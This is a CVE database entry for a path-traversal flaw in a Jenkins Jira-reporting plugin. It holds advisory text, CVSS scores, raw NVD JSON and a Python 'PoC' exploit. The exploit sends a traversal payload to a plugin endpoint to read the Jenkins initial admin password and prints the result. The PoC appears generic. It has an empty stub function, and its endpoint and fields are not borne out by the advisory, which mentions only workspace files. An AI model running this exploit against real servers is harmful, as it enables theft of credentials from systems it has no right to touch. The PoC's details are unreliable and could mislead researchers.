Security Vulnerability Report
CVE-2025-67643 CVSS 4.3 MEDIUM

CVE-2025-67643

Published: 2025-12-10 17:15:57
Last Modified: 2025-12-17 17:19:55

Description

Jenkins Redpen - Pipeline Reporter for Jira Plugin 1.054.v7b_9517b_6b_202 and earlier does not correctly perform path validation of the workspace directory while uploading artifacts to Jira, allowing attackers with Item/Configure permission to retrieve files present on the Jenkins controller workspace directory.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:redpen_-_pipeline_reporter_for_jira:*:*:*:*:*:jenkins:*:* - VULNERABLE
Jenkins Redpen - Pipeline Reporter for Jira Plugin <= 1.054.v7b_9517b_6b_202

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67643 PoC - Path Traversal in Jenkins Redpen Plugin
# This PoC demonstrates how an attacker with Item/Configure permission
# can read arbitrary files from Jenkins controller workspace
import requests
import json

JENKINS_URL = "http://target-jenkins-server:8080"
TARGET_PLUGIN = "/redpen-jira/uploadArtifact"
# Authentication with Item/Configure permission
AUTH_TOKEN = "base64_encoded_user:api_token"


def exploit_path_traversal():
    """
    Exploit the path traversal vulnerability to read sensitive files
    """
    headers = {
        "Authorization": f"Basic {AUTH_TOKEN}",
        "Content-Type": "application/json"
    }
    # Path traversal payload to read Jenkins credentials
    traversal_path = "../../../../var/jenkins_home/secrets/initialAdminPassword"
    payload = {
        "artifactPath": traversal_path,
        "jobName": "vulnerable-job",
        "buildNumber": 1
    }
    try:
        response = requests.post(
            f"{JENKINS_URL}{TARGET_PLUGIN}",
            headers=headers,
            json=payload,
            timeout=30
        )
        if response.status_code == 200:
            print("[+] Successfully exploited path traversal vulnerability")
            print(f"[+] Retrieved content: {response.text}")
            return response.text
        else:
            print(f"[-] Exploitation failed: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return None


def check_plugin_version():
    """
    Check if target is running vulnerable version
    """
    # Query Jenkins plugin manager API
    pass


if __name__ == "__main__":
    print("CVE-2025-67643 Path Traversal Exploitation")
    print("Target: Jenkins Redpen - Pipeline Reporter for Jira Plugin")
    exploit_path_traversal()
```

References

https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3290 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67643", "sourceIdentifier": "[email protected]", "published": "2025-12-10T17:15:56.870", "lastModified": "2025-12-17T17:19:54.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins Redpen - Pipeline Reporter for Jira Plugin 1.054.v7b_9517b_6b_202 and earlier does not correctly perform path validation of the workspace directory while uploading artifacts to Jira, allowing attackers with Item/Configure permission to retrieve files present on the Jenkins controller workspace directory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:redpen_-_pipeline_reporter_for_jira:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "1.054.v7b_9517b_6b_202", "matchCriteriaId": "690EE16A-A47C-402B-A56D-D6EA361A2A22"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-12-10/#SECURITY-3290", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}